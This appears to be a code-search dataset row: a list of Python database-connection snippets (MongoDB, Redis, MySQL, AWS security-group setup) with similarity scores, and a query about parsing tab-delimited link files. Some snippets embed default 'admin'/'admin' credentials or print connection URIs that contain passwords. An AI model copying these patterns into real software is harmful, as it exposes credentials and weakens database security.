pymongo.MongoClient(f\"mongodb+srv://{user}:{password}\\\[email protected]/{dbname}?retryWrites=true&w=majority\")\n db = client.test\n\n return db", "def mmo_connect(self):\n client = MongoClient(self.hostname, self.port)\n client[self.authentication_db].authenticate(self.username, self.password)\n if self.mmo_is_mongos(client) == False:\n raise Exception(\"MongoDB connection is not a mongos process\")\n else:\n return client", "def mongodb_connect():\n # Load environment variables\n dotenv_path = find_dotenv()\n load_dotenv(dotenv_path)\n # Connect to the db\n # DB will be created if it doesn't already exist\n client = pymongo.MongoClient(os.environ.get(\"DATABASE_URL\"), 27017)\n db = client.tweetbase\n return db", "def bootstrap(self):\n\n self.db = connection_manager.get(DbConnection, host=self.ip, port=3306, user=self.user, password=self.password)\n\n self.connected = True", "def _connect(self):\n conn = pymongo.MongoClient(self._config.get('mongodb', 'host'), self._config.getint('mongodb', 'port'))\n db = conn[self._config.get('mongodb', 'db')]\n return db[self._config.get('mongodb', 'collection')]", "def mmo_connect_mongod(self, hostname=\"localhost\", port=27017, username=\"admin\", password=\"admin\", authentication_db=\"admin\"):\n if self.mmo_is_mongo_up(hostname, port):\n client = MongoClient(hostname, port)\n client[authentication_db].authenticate(username, password)\n if self.mmo_is_mongod(client) == False:\n raise Exception(\"MongoDB connection is not a mongod process\")\n else:\n return client\n else:\n raise Exception(\"mongod process is not up\")", "def init_db(self):\n _client = pymongo.MongoClient(username=self.config['database']['admin'],\n password=self.config['database']['admin_pwd'],\n host=self.config['database']['host'],\n port=self.config['database']['port'])\n # _id: db_name.user_name\n user_ids = [_u['_id'] for _u in _client.admin.system.users.find({}, {'_id': 1})]\n\n db_name = self.config['database']['db']\n username = self.config['database']['user']\n\n # print(f'{db_name}.{username}')\n # print(user_ids)\n\n if f'{db_name}.{username}' not in user_ids:\n _client[db_name].command('createUser', self.config['database']['user'],\n pwd=self.config['database']['pwd'], roles=['readWrite'])\n print('Successfully initialized db')", "def __init__(self, ):\n super().__init__()\n self.duplicate_posts = 0\n self.new_posts = 0\n self.client = MongoClient('mongodb://{}:{}/'.format(_config['db']['hostname'], _config['db']['port']))\n self.db = self.client[_config['db']['database']]\n self.posts = self.db[_config['db']['collection']]\n self.posts.ensure_index(\"postId\", unique=True)", "def __init__(self, **kwargs):\r\n\r\n super(MongoBackend, self).__init__(**kwargs)\r\n\r\n # Extract connection parameters from kwargs\r\n\r\n host = kwargs.get('host', 'localhost')\r\n port = kwargs.get('port', 27017)\r\n\r\n user = kwargs.get('user', '')\r\n password = kwargs.get('password', '')\r\n\r\n db_name = kwargs.get('database', 'track')\r\n collection_name = kwargs.get('collection', 'events')\r\n\r\n # Other mongo connection arguments\r\n extra = kwargs.get('extra', {})\r\n\r\n # By default disable write acknowledgments, reducing the time\r\n # blocking during an insert\r\n extra['w'] = extra.get('w', 0)\r\n\r\n # Make timezone aware by default\r\n extra['tz_aware'] = extra.get('tz_aware', True)\r\n\r\n # Connect to database and get collection\r\n\r\n self.connection = MongoClient(\r\n host=host,\r\n port=port,\r\n **extra\r\n )\r\n\r\n database = self.connection[db_name]\r\n\r\n if user or password:\r\n database.authenticate(user, password)\r\n\r\n self.collection = database[collection_name]\r\n\r\n self._create_indexes()", "def connect_to_mongo(self, host='127.0.0.1', port=27017, instance='local'):\n if instance == 'prod':\n logging.info('connecting to mongo Atlas')\n self.db_client = MongoClient('mongodb+srv://{}:{}@{}/'\n '{}?retryWrites=true&w=majority'.format(self.config['db']['username'],\n self.config['db']['password'],\n self.config['db']['atlas'],\n self.db_name))\n else:\n logging.info('connecting to local Atlas')\n self.db_client = MongoClient(host, port)", "def __init__(self, dst_mongodb_uri, dst_database, dst_collection, dry_run):\n self.client = pymongo.MongoClient(dst_mongodb_uri)\n self.dst_mongodb_uri = dst_mongodb_uri\n self.lookup_col = self.client[dst_database][dst_collection]\n self.dry_run = dry_run", "def __init__(self, port):\n self.db = MongoClient('localhost', port)['291db']\n self.posts = db[\"Posts\"]\n self.votes = db[\"Votes\"]\n self.tags = db[\"Tags\"]\n self.uid = None", "def __init__(self, conf_settings):\n self.conf_settings = conf_settings\n self.db_type = \"crits\"\n self.db_client = pymongo.MongoClient(str(self.conf_settings['mongo_uri']))\n self.db_conn = self.db_client[\"crits\"]\n if self.conf_settings['mongo_user']:\n\t\t\tself.db_conn.authenticate(str(self.conf_settings['mongo_user']), str(self.conf_settings['mongo_password']))\n self.set_database_defaults()\n self.CRITs_mappings()", "def did_mongod_start(self, port=0, timeout=60):\r\n if port == 0:\r\n port = self.port\r\n \r\n while timeout > 0:\r\n time.sleep(1)\r\n try:\r\n _connect_to_mongo_port(int(port))\r\n return True\r\n except OSError as ex:\r\n print >> sys.stderr, ex\r\n timeout = timeout - 1\r\n except Exception as ex:\r\n print >> sys.stderr, ex\r\n timeout = timeout - 1\r\n print >> sys.stderr, \"timeout starting mongod\"\r\n return False", "def get_mongo_conn():\n MONGO_URI = 'mongodb://saran:[email protected]:13736/ingredientmaster'\n client = pymongo.MongoClient(MONGO_URI)\n db = client.get_database('ingredientmaster')\n return db", "def do_connection(\r\n db, collection, host, port=27017, tz_aware=True, user=None, password=None, **kwargs\r\n ):\r\n self.database = pymongo.database.Database(\r\n pymongo.MongoClient(\r\n host=host,\r\n port=port,\r\n tz_aware=tz_aware,\r\n # deserialize dicts as SONs\r\n document_class=SON,\r\n **kwargs\r\n ),\r\n db\r\n )\r\n self.collection = self.database[collection]\r\n\r\n if user is not None and password is not None:\r\n self.database.authenticate(user, password)", "def get_connection():\n return MongoClient(\"mongodb://username:password@localhost:27017\")", "def mongo_client():\n return MongoClient(STRING_CONNECTION)", "def test_rollback(self):\n os.system('rm config.txt; touch config.txt')\n test_oplog, primary_conn, mongos, solr = self.get_new_oplog()\n\n if not start_cluster():\n self.fail('Cluster could not be started successfully!')\n\n solr = DocManager()\n test_oplog.doc_manager = solr\n solr._delete() # equivalent to solr.delete(q='*: *')\n\n mongos['test']['test'].remove({})\n mongos['test']['test'].insert( \n {'_id': ObjectId('4ff74db3f646462b38000001'),\n 'name': 'paulie'},\n safe=True\n )\n while (mongos['test']['test'].find().count() != 1):\n time.sleep(1)\n cutoff_ts = test_oplog.get_last_oplog_timestamp()\n\n first_doc = {'name': 'paulie', '_ts': bson_ts_to_long(cutoff_ts),\n 'ns': 'test.test',\n '_id': ObjectId('4ff74db3f646462b38000001')}\n\n #try kill one, try restarting\n kill_mongo_proc(primary_conn.host, PORTS_ONE['PRIMARY'])\n\n new_primary_conn = Connection(HOSTNAME, int(PORTS_ONE['SECONDARY']))\n admin = new_primary_conn['admin']\n while admin.command(\"isMaster\")['ismaster'] is False:\n time.sleep(1)\n time.sleep(5)\n count = 0\n while True:\n try:\n mongos['test']['test'].insert({\n '_id': ObjectId('4ff74db3f646462b38000002'),\n 'name': 'paul'}, \n safe=True)\n break\n except OperationFailure:\n count += 1\n if count > 60:\n self.fail('Call to insert doc failed too many times')\n time.sleep(1)\n continue\n while (mongos['test']['test'].find().count() != 2):\n time.sleep(1)\n kill_mongo_proc(primary_conn.host, PORTS_ONE['SECONDARY'])\n start_mongo_proc(PORTS_ONE['PRIMARY'], \"demo-repl\", \"/replset1a\",\n \"/replset1a.log\", None)\n\n #wait for master to be established\n while primary_conn['admin'].command(\"isMaster\")['ismaster'] is False:\n time.sleep(1)\n\n start_mongo_proc(PORTS_ONE['SECONDARY'], \"demo-repl\", \"/replset1b\",\n \"/replset1b.log\", None)\n\n #wait for secondary to be established\n admin = new_primary_conn['admin']\n while admin.command(\"replSetGetStatus\")['myState'] != 2:\n time.sleep(1)\n while retry_until_ok(mongos['test']['test'].find().count) != 1:\n time.sleep(1)\n\n self.assertEqual(str(new_primary_conn.port), PORTS_ONE['SECONDARY'])\n self.assertEqual(str(primary_conn.port), PORTS_ONE['PRIMARY'])\n\n last_ts = test_oplog.get_last_oplog_timestamp()\n second_doc = {'name': 'paul', '_ts': bson_ts_to_long(last_ts),\n 'ns': 'test.test', \n '_id': ObjectId('4ff74db3f646462b38000002')}\n\n test_oplog.doc_manager.upsert(first_doc)\n test_oplog.doc_manager.upsert(second_doc)\n\n test_oplog.rollback()\n test_oplog.doc_manager.commit()\n results = solr._search()\n\n assert(len(results) == 1)\n\n self.assertEqual(results[0]['name'], 'paulie')\n self.assertTrue(results[0]['_ts'] <= bson_ts_to_long(cutoff_ts))\n\n #test_oplog.join()", "def __init__(self, db_cfg_name, collection_cfg_name, mode = 'r'):\n from ir_config import IRConfig\n connection = IRMongodbHelper.get_instance().get_connection()\n self.__db_name = IRConfig.get_instance().get(db_cfg_name)\n self.__collection_name = IRConfig.get_instance().get(collection_cfg_name)\n self.__mode = mode\n self.__collection = connection[self.__db_name][self.__collection_name]\n self.__is_closed = False\n if mode != 'r':\n IRMongodbHelper.get_instance().update_meta(\n self.__db_name, self.__collection_name, False)\n if mode == 'w':\n self.__collection.drop()", "def __init__(self):\n self.__default_config = ConfigParams.from_tuples(\n 'options.max_pool_size', 2,\n 'options.connect_timeout', 5000,\n 'options.auto_reconnect', True,\n 'options.max_page_size', 100,\n 'options.debug', True\n )\n\n # The logger\n self._logger: CompositeLogger = CompositeLogger()\n # The connection resolver\n self._connection_resolver: MongoDbConnectionResolver = MongoDbConnectionResolver()\n # The configuration options.\n self._options: ConfigParams = ConfigParams()\n # The MongoDB connection object.\n self._connection: pymongo.MongoClient = None\n # The MongoDB database name.\n self._database_name: str = None\n # The MongoDb database object.\n self._db: database.Database = None", "def open_mongo() -> None:\n os.system('launchctl start homebrew.mxcl.mongodb-community')", "def __init__(self, source='10.0.2.32', is_local=False):\n super().__init__(source, is_local)\n self.client = MongoClient(source)", "def __init__(self):\n self._rcon = None\n self._host = CONFIG.redis.host\n self._port = CONFIG.redis.port\n self._db = CONFIG.redis.database\n self.refresh()", "def reset(self):\n self.reconnect()", "def __init__(self, client=None, timeout=300, database_name=None, host=None, port=None):\n self.client = MongoClient() if client is None else client\n self.db = self.client.cache\n self.timeout = timeout", "def setUp(self):\n self.conn = seed.connect_to_db(\"testing\")\n self.cur = self.conn.cursor()\n\n # setting cur and conn in seed to test cur and conn (if we don't do this we get a 'cur is undefined' error)\n seed.cur = self.conn.cursor()\n seed.conn = self.conn", "def configure(self, options, conf):\n # This option has to be specified on the command line, to enable the\n # plugin.\n if not options.mongoengine or options.mongodb_bin:\n return\n\n if not options.mongodb_bin:\n self.mongodb_param['mongodb_bin'] = scan_path()\n if self.mongodb_param['mongodb_bin'] is None:\n raise AssertionError(\n \"Mongoengine plugin enabled, but no mongod on path, \"\n \"please specify path to binary\\n\"\n \"ie. --mongoengine-mongodb=/path/to/mongod\")\n else:\n self.mongodb_param['mongodb_bin'] = os.path.abspath(\n os.path.expanduser(os.path.expandvars(options.mongodb_bin)))\n if not os.path.exists(self.mongodb_param['mongodb_bin']):\n raise AssertionError(\n \"Invalid mongodb binary %r\" % \\\n self.mongodb_param['mongodb_bin'])\n\n # Its necessary to enable in nose\n self.enabled = True\n\n db_log_path = os.path.expandvars(os.path.expanduser(\n options.mongodb_logpath))\n try:\n db_file = open(db_log_path, \"w\")\n db_file.close()\n except Exception as exc:\n raise AssertionError(\"Invalid log path %r\" % exc)\n\n if not options.mongodb_port:\n self.mongodb_param['db_port'] = get_open_port()\n else:\n self.mongodb_param['db_port'] = options.mongodb_port\n\n db_prealloc = options.mongodb_prealloc\n db_scripting = options.mongodb_scripting\n\n self.clear_context['module'] = options.mongoengine_clear_after_module\n self.clear_context['class'] = options.mongoengine_clear_after_class\n\n # generate random database name\n self.database_name = str(uuid.uuid1())\n\n #########################################\n # Start a instance of mongo\n #########################################\n\n # Stores data here\n self.mongodb_param['db_path'] = tempfile.mkdtemp()\n if not os.path.exists(self.mongodb_param['db_path']):\n os.mkdir(self.mongodb_param['db_path'])\n\n args = [\n self.mongodb_param['mongodb_bin'],\n \"--dbpath\",\n self.mongodb_param['db_path'],\n \"--port\",\n str(self.mongodb_param['db_port']),\n # don't flood stdout, we're not reading it\n \"--quiet\",\n # save the port\n \"--nohttpinterface\",\n # disable unused.\n \"--nounixsocket\",\n # use a smaller default file size\n \"--smallfiles\",\n # journaling on by default in 2.0 and makes it to slow\n # for tests, can causes failures in jenkins\n \"--nojournal\",\n # Default is /dev/null\n \"--logpath\",\n db_log_path,\n \"-vvvvv\"\n ]\n\n if not db_prealloc:\n args.append(\"--noprealloc\")\n\n if not db_scripting:\n args.append(\"--noscripting\")\n\n self.process = Popen(\n args,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT\n )\n\n self._running = True\n os.environ[\"TEST_MONGODB\"] = \"localhost:%s\" % \\\n self.mongodb_param['db_port']\n os.environ[\"TEST_MONGODB_DATABASE\"] = self.database_name\n\n # Give a moment for mongodb to finish coming up\n time.sleep(float(options.wait_time))\n\n # Connecting using mongoengine\n self.connection = connect(self.database_name, host=\"localhost\",\n port=self.mongodb_param['db_port'])", "def __init__(self, mongodb_settings, interval, max_ops_limit):\n self.__conn = None\n self.__dbs = {}\n self.__interval = interval\n self.mongodb_settings = mongodb_settings\n self.max_ops_limit = max_ops_limit\n self.last_execution_time = time()\n self.results = {}", "def setUpClass(cls):\n\n if not dbenabled:\n print('Unable to run UserWAMPTests: mongodb not enabled')", "def load_mongo_configuration(ec2_conn,base_name,params ):\n print \"loading mongo configurings\"\n \n ## Allow security from build server to mongodb\n app_type = 'MONGO'\n \n mongo_sec_grp_name = get_secgrp_name( base_name, app_type )\n mongo_sec_grp = find_secgrp(ec2_conn, mongo_sec_grp_name)\n \n try :\n mongo_sec_grp.authorize( ip_protocol = \"tcp\",\n from_port = 27017,\n to_port = 27017,\n cidr_ip = build_server_cidr )\n except :\n print \"rule exists aready\" \n \n mongo_host = params.get( 'host' )\n mongo_port = params.get( 'port' )\n mongo_username = params.get( 'user-name' )\n mongo_password = params.get( 'password' )\n \n db_name = params.get( 'db_name' )\n collection_name = params.get( 'collection_name' )\n \n documents = params.get( 'documents' )\n \n uri = \"\"\n if len( mongo_username ) > 0 :\n uri = \"mongodb://\"+mongo_username+\":\"+mongo_password+\"@\"+mongo_host+\":\"+mongo_port+\"/\"\n else :\n uri = \"mongodb://\"+mongo_host+\":\"+mongo_port+\"/\"\n \n print \"Mongo Connect URL:\" +uri\n \n \n client = MongoClient(uri)\n \n\n db = client[db_name]\n collection = db[collection_name ]\n \n collection.remove()\n \n for document in documents :\n document = json.dumps(document)\n document = loads(document)\n collection.insert(document)\n document['createdTime'] = datetime.datetime.utcnow()\n collection.save(document)\n \n ## At the end revoke the build server rule \n try :\n mongo_sec_grp.revoke( ip_protocol = \"tcp\",\n from_port = 27017,\n to_port = 27017,\n cidr_ip = build_server_cidr)\n \n except :\n print \"exception removing rule\"\n \n print \"configured\"", "def start(self) -> None:\n if not self._mongo_available:\n return\n operations_thread = threading.Thread(target=self._run, args=())\n operations_thread.setDaemon(True)\n operations_thread.start()", "def connectToMongo():\n mongodb_uri = os.environ.get(\"DATABASE_URI\", \"\") or \"mongodb://localhost:27017\" \n client = pymongo.MongoClient(mongodb_uri)\n return client.insights_db # Declare the DB", "def __init__(\r\n self, db, collection, host, port=27017, tz_aware=True, user=None, password=None, **kwargs\r\n ):\r\n self.database = pymongo.database.Database(\r\n pymongo.MongoClient(\r\n host=host,\r\n port=port,\r\n tz_aware=tz_aware,\r\n document_class=son.SON,\r\n **kwargs\r\n ),\r\n db\r\n )\r\n\r\n if user is not None and password is not None:\r\n self.database.authenticate(user, password)\r\n\r\n self.course_index = self.database[collection + '.active_versions']\r\n self.structures = self.database[collection + '.structures']\r\n self.definitions = self.database[collection + '.definitions']\r\n\r\n # every app has write access to the db (v having a flag to indicate r/o v write)\r\n # Force mongo to report errors, at the expense of performance\r\n # pymongo docs suck but explanation:\r\n # http://api.mongodb.org/java/2.10.1/com/mongodb/WriteConcern.html\r\n self.course_index.write_concern = {'w': 1}\r\n self.structures.write_concern = {'w': 1}\r\n self.definitions.write_concern = {'w': 1}", "def reconnect(self):\n self.test_cmd()\n if not self.check_network: \n self.reset()\n attempt=0\n while not self.check_network and attempt<self.retries:\n self.full_reset()\n attempt+=1", "def __init_db(self, db_name):\n\t\tclient = pymongo.MongoClient(self.__db_url)\n\t\treturn client[db_name]", "def install_mongo ( vpc_conn, ec2_conn, cloudwatch_conn, vpc, base_name, aws_account_type, base_topicarn, params ):\n app_type = 'MONGO'\n mongo_keypair = get_keypair_name( aws_account_type, vpc.region.name, app_type )\n print mongo_keypair\n mongo_sec_grp_name = get_secgrp_name( base_name, app_type )\n \n print \"mongo_sec_grp_name\" + mongo_sec_grp_name\n \n mongo_sec_grp = find_secgrp(ec2_conn, mongo_sec_grp_name)\n print mongo_sec_grp\n \n if not mongo_sec_grp :\n mongo_sec_grp = create_secgrp( ec2_conn,\n vpc,\n mongo_sec_grp_name,\n 'Controls access to the ' + app_type )\n print mongo_sec_grp \n \n remove_all_rules( ec2_conn, [ mongo_sec_grp ],deep = True,base_name = base_name)\n grant_ssh_access( ec2_conn, [ mongo_sec_grp ], find_group( ec2_conn, base_name, 'NAT' ) )\n grant_grp_self_access ( ec2_conn, mongo_sec_grp, 0, 65535, protocol = 'tcp' )\n \n mongo_ami_name = base_name + '-' + app_type\n \n mongo_ami = get_ami_by_name( ec2_conn, mongo_ami_name )\n if not mongo_ami :\n mongo_ami = get_ami_by_name( ec2_conn, default_mongo_ami )\n\n print \"Creating mongoDB Instances\"\n \n mongo_subnets = get_vpc_subnets( vpc_conn, vpc, 'STATIC' )\n mongo_sec_grps = ec2_conn.get_all_security_groups( filters = { \"group-name\" : [ mongo_sec_grp_name ] } )\n \n primary_ip = get_primary_node(mongo_subnets)\n mongo_instances = []\n mongo_config = get_mongo_config(mongo_subnets)\n \n user_data = None\n primary_instance_id = None\n primary_subnet = None\n for subnet in mongo_subnets :\n cidr_block = subnet.cidr_block\n \n if cidr_block == primary_ip :\n primary_subnet = subnet\n \n # First launch the secondary instances\n if cidr_block != primary_ip :\n instance_private_ip = get_static_ip(subnet.cidr_block, \"0/24\", mongo_ip_block)\n zone_letter = subnet.availability_zone[-1:].upper( )\n mongo = launch_instance_vpc( ec2_conn,\n mongo_ami,\n base_name = base_name,\n instance_type = app_type,\n keypair = mongo_keypair,\n machine_type = 'm3.xlarge',\n security_group_id = mongo_sec_grps[0].id ,\n subnet_id = subnet.id,\n public_ip = False,\n user_data = user_data,\n static_ip_address = instance_private_ip )\n mongo_instances.append( mongo )\n\n print \"Setting alarms on the mongo instance\"\n add_monitors_to_instance( cloudwatch_conn, base_name, mongo.id, app_type, base_topicarn, mongo_monitor_rules )\n\n user_data = base64.b64encode(mongo_config)\n \n print \"Launching primary mongo instance\"\n print \"primary_subnet \" +primary_subnet.cidr_block\n instance_private_ip = get_static_ip(primary_subnet.cidr_block, \"0/24\", mongo_ip_block)\n zone_letter = subnet.availability_zone[-1:].upper( )\n mongo = launch_instance_vpc( ec2_conn,\n mongo_ami,\n base_name = base_name,\n instance_type = app_type,\n keypair = mongo_keypair,\n machine_type = 'm3.xlarge',\n security_group_id = mongo_sec_grps[0].id ,\n subnet_id = primary_subnet.id,\n public_ip = False,\n user_data = user_data,\n static_ip_address = instance_private_ip )\n mongo_instances.append( mongo)\n \n print \"Setting alarms on the mongo instance\"\n add_monitors_to_instance( cloudwatch_conn, base_name, mongo.id, app_type, base_topicarn, mongo_monitor_rules )", "def _connect_to_mongo_port(port):\r\n \r\n sock = socket.socket()\r\n sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\r\n sock.settimeout(1)\r\n sock.connect((\"localhost\", int(port)))\r\n sock.close()", "def __init__(self, host='127.0.0.1', port=27017, handle_error=False):\n self.host = host\n self.port = port\n self.connection = None\n self.handle_error = handle_error", "def _reset_session(self):\n retries = self.__no_of_retries\n\n while retries > 0:\n if not self._is_session_valid():\n self._close()\n self._set_session()\n else:\n break\n retries -= 1\n else:\n raise DatabaseError.ConnectionError(\"Connection to database not available!\")", "def populateMongoDB():\n client = MongoClient()\n db = client.test\n collection = db.test_collection\n collection.delete_many({})\n print(\"populating mongoDB...\")\n sites = readBrowserHistory()\n for site in sites:\n predict(db, site)\n client.close()", "def work(self):\n self.config_file = self.args.config\n self.init_config()\n self.init_db()\n\n self.kickoff()", "def setup(self):\n\t\ttry:\n\t\t\tdatabase = redis.StrictRedis(host=self.HOST, port=self.PORT, db=self.DB)\n\n\t\t\tself.logger.info(\"Successfully established Redis connection.\")\n\n\t\t\treturn database\n\n\t\texcept redis.exceptions.ConnectionError as err:\n\t\t\traise err", "def mmo_is_mongo_up(self, hostname, port=27017):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n service_up = False\n try:\n s.connect((hostname, port))\n service_up = True\n s.close()\n except socket.error as e:\n pass\n except Exception as e:\n raise e\n return service_up", "def init_connection(self, db):\n log.info(\"== Stage 1: Init ==\")\n self.use_db(db)\n self.set_no_binlog()\n self.get_mysql_settings()\n self.init_mysql_version()\n self.sanity_checks()\n self.set_tx_isolation()\n self.set_sql_mode()\n self.enable_priority_ddl()\n self.skip_cache_fill_for_myrocks()\n self.enable_sql_wsenv()\n self.override_session_vars()\n self.get_osc_lock()", "async def _get_pymongo_instance(app: web.Application , url) -> None:\n try:\n log.info(f'Getting pymongo instance')\n mongo_instance = dict()\n _cli = MongoClient(url)\n mongo_instance['client'] = _cli\n mongo_instance['db'] = _cli['versiondb']\n app['mongo'] = mongo_instance\n await asyncio.sleep(1)\n\n except Exception as e:\n\n log.error(f'_get_pymongo_instance {e}')\n raise e", "def __init__(self, dbname='cards'):\n\n self._client = MongoClient()\n self._db = self._client[dbname]\n self._collection = self._db[dbname]\n self._keys = ['set', 'color', 'text', 'creator']", "def __init__(self, host='127.0.0.1', port=27017):\n self.host = host\n self.port = port\n self.connection = None", "def __init__(self, host='127.0.0.1', port=27017):\n self.host = host\n self.port = port\n self.connection = None", "def __init__(self, host='127.0.0.1', port=27017):\n self.host = host\n self.port = port\n self.connection = None", "def __init__(self, host='127.0.0.1', port=27017):\n self.host = host\n self.port = port\n self.connection = None", "def __init__(self, host='127.0.0.1', port=27017):\n self.host = host\n self.port = port\n self.connection = None", "def __init__(self, host='127.0.0.1', port=27017):\n self.host = host\n self.port = port\n self.connection = None", "def __init__(\n self,\n client: pymongo.MongoClient,\n database_name: str,\n session_id: uuid.UUID,\n ):\n self.mongo_client = client\n self.session_id = session_id\n self.mongo_database = client.get_database(database_name)", "def prepare_buy(self):\n self.redisHandle.connect_redis(\"localhost\")\n # [TODO] check return value", "def database_connectivity():\n\n port = \"mongodb://localhost:27017/\"\n client = pymongo.MongoClient(host=port)\n\n db = client[\"Password_Manager\"]\n collection = db[\"Passwords\"]\n\n return collection" ]
[ "0.70171124", "0.68669546", "0.6740658", "0.6647585", "0.6619428", "0.6484099", "0.6464825", "0.6440319", "0.6433522", "0.6415763", "0.6397156", "0.6346596", "0.6345212", "0.62915", "0.6224574", "0.61763144", "0.61705923", "0.6150122", "0.6147837", "0.613134", "0.60872823", "0.60645425", "0.6053271", "0.60391504", "0.6031125", "0.59661055", "0.59654367", "0.5933904", "0.5931982", "0.59276146", "0.5905916", "0.5873731", "0.58670795", "0.5851349", "0.5834826", "0.5833121", "0.5798111", "0.57308143", "0.57206386", "0.5694944", "0.5691278", "0.5676863", "0.5675909", "0.56737375", "0.56618094", "0.5652388", "0.56522053", "0.5642387", "0.5622988", "0.56194735", "0.56156784", "0.5610888", "0.5610588", "0.55984205", "0.55890137", "0.5584256", "0.5563932", "0.5559973", "0.55494314", "0.5532938", "0.5504866", "0.5499264", "0.5497624", "0.5492155", "0.54858595", "0.54832923", "0.5481011", "0.54788226", "0.5456368", "0.5455903", "0.5447397", "0.54411685", "0.54331964", "0.5432086", "0.543102", "0.5424725", "0.54170173", "0.5412443", "0.5411402", "0.54069865", "0.5404397", "0.5403477", "0.540324", "0.54025316", "0.53897077", "0.5384297", "0.53766155", "0.53697085", "0.5367396", "0.53667456", "0.53623396", "0.5360645", "0.5360645", "0.5360645", "0.5360645", "0.5360645", "0.5360645", "0.53485465", "0.5330509", "0.5316453" ]
0.6147428
19
Open a tab delimited file and return links and time
def parser(list_of_text): # Youtube link regex yt_link = re.compile(r"http(s)?:\/\/www\.youtu.*") pron_link = re.compile(r".*pornhub.*") pic_link = re.compile(r"^http(s)?:\/\/.*jpg.*") pics = [link.split() for link in list_of_text if re.match(pic_link, link)] found_yt_links = [line.split() for line in list_of_text if re.match(yt_link, line)] found_pron = [line.split() for line in list_of_text if re.match(pron_link, line)] joined_links = found_yt_links + found_pron return joined_links, pics
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def readTab(file_name):\n data = []\n meta = []\n l=0\n for line in open(file_name):\n if l<3:\n meta.append(line.strip(\"\\n\").split(\"\\t\"))\n else:\n if len(line.strip(\"\\n\").split(\"\\t\")) == len(meta[0]):\n data.append(line.strip(\"\\n\").split(\"\\t\"))\n l += 1\n return (meta, data)", "def readFile(filename, sep=',', fformat=\"TEDGE\", timestampformat=\"%s\", maxlines=sys.maxsize):\n \n assert filename is not \"\"\n assert (fformat is \"TEDGE\") or (fformat is \"TRIGRAM\")\n \n with open(filename, 'r') as f:\n tedges = []\n twopaths = []\n \n header = f.readline()\n header = header.split(sep)\n\n # We support arbitrary column ordering, if header columns are included\n time_ix = -1\n source_ix = -1\n mid_ix = -1\n weight_ix = -1\n target_ix = -1\n if fformat ==\"TEDGE\":\n for i in range(len(header)):\n header[i] = header[i].strip()\n if header[i] == 'node1' or header[i] == 'source':\n source_ix = i\n elif header[i] == 'node2' or header[i] == 'target':\n target_ix = i\n elif header[i] == 'time' or header[i] == 'timestamp':\n time_ix = i\n elif fformat ==\"TRIGRAM\":\n # For trigram files, we assume a default of (unweighted) trigrams in the form source;mid;target\n # Any other ordering, as well as the additional inclusion of weights requires the definition of \n # column headers in the data file!\n source_ix = 0\n mid_ix = 1\n target_ix = 2\n for i in range(len(header)):\n header[i] = header[i].strip()\n if header[i] == 'node1' or header[i] == 'source':\n source_ix = i \n elif header[i] == 'node2' or header[i] == 'mid':\n mid_ix = i\n elif header[i] == 'node3' or header[i] == 'target':\n target_ix = i\n elif header[i] == 'weight':\n weight_ix = i \n\n assert( (source_ix >= 0 and target_ix >= 0) or\n (source_ix >= 0 and mid_ix >= 0 and target_ix >= 0 and weight_ix >= 0)), \"Detected invalid header columns: %s\" % header\n\n if time_ix<0:\n Log.add('No time stamps found in data, assuming consecutive links', Severity.WARNING)\n \n # Read time-stamped links\n if fformat == \"TEDGES\":\n Log.add('Reading time-stamped links ...')\n else:\n Log.add('Reading trigram data ...')\n\n line = f.readline()\n n = 1 \n while line and n <= maxlines:\n fields = line.rstrip().split(sep)\n if fformat ==\"TEDGE\":\n try:\n if time_ix >=0:\n timestamp = fields[time_ix] \n if timestamp.isdigit():\n t = int(timestamp)\n else:\n x = dt.datetime.strptime(timestamp, \"%Y-%m-%d %H:%M\")\n t = int(time.mktime(x.timetuple()))\n else:\n t = n \n if t>=0:\n tedge = (fields[source_ix], fields[target_ix], t)\n tedges.append(tedge)\n else:\n Log.add('Ignoring negative timestamp in line ' + str(n+1) + ': \"' + line.strip() + '\"', Severity.WARNING)\n except (IndexError, ValueError):\n Log.add('Ignoring malformed data in line ' + str(n+1) + ': \"' + line.strip() + '\"', Severity.WARNING)\n\n elif fformat ==\"TRIGRAM\":\n source = fields[source_ix].strip('\"')\n mid = fields[mid_ix].strip('\"')\n target = fields[target_ix].strip('\"')\n if weight_ix >=0: \n weight = float(fields[weight_ix].strip('\"'))\n else:\n weight = 1\n tp = (source, mid, target, weight)\n twopaths.append(tp)\n\n line = f.readline()\n n += 1\n # end of with open()\n \n Log.add('finished.')\n if fformat == \"TEDGE\": \n return tn.TemporalNetwork(tedges = tedges, sep=sep)\n elif fformat ==\"TRIGRAM\":\n # If trigram data did not contain a weight column, we aggregate\n # multiple occurrences to weighted trigrams\n if weight_ix < 0: \n Log.add('Calculating trigram weights ...')\n tp_dict = defaultdict( lambda: 0)\n for trigram in twopaths:\n tp = (trigram[0], trigram[1], trigram[2])\n tp_dict[tp] = tp_dict[tp] + trigram[3]\n twopaths = []\n for tp in tp_dict.keys():\n twopaths.append((tp[0], tp[1], tp[2], tp_dict[tp]))\n Log.add('finished.')\n return tn.TemporalNetwork(twopaths = twopaths, sep=sep)", "def load_tweets(fp):\r\n ans = pd.read_csv(fp, sep='\\t')\r\n return ans", "def read_tsv(data_loc, fname):\n tf = codecs.open(data_loc + fname, 'r', encoding='utf-8')\n data = []\n labels = []\n fnames = []\n for line in tf:\n (ifname, label) = line.strip().split(\"\\t\")\n content = read_instance(data_loc, ifname)\n labels.append(label)\n fnames.append(ifname)\n data.append(content)\n tf.close()\n return data, fnames, labels", "def read_data(file):\n data = pd.read_csv('facebook-links.txt.anon', delimiter=\"\\t\", header=None)\n data.columns = ['user', 'user_friend_list', 'time']\n return data", "def parse_file(file_path, separator='\\t'):\n\n\ttable = []\n\twith open(file_path) as file:\n\t\tfor line in file:\n\t\t\t# Remove newline character.\n\t\t\tline = line.rstrip('\\n')\n\t\t\t\n\t\t\t# Parse the line.\n\t\t\trow = line.split(separator)\n\n\t\t\ttable.append(row)\n\n\treturn table", "def parse_timetable(filename, behaviour_on_unsupported_data = \"once\", behaviour_on_unrecognised_data = \"once\"):\n\n filterwarnings(behaviour_on_unsupported_data, \".*\", UnsupportedWarning)\n filterwarnings(behaviour_on_unrecognised_data, \".*\", UnrecognisedWarning)\n\n transaction_types = {\"N\": \"new\",\n \"D\": \"delete\",\n \"R\": \"revise\"}\n\n days = [\"Mon\", \"Tue\", \"Wed\", \"Thu\", \"Fri\", \"Sat\", \"Sun\"]\n\n\n with 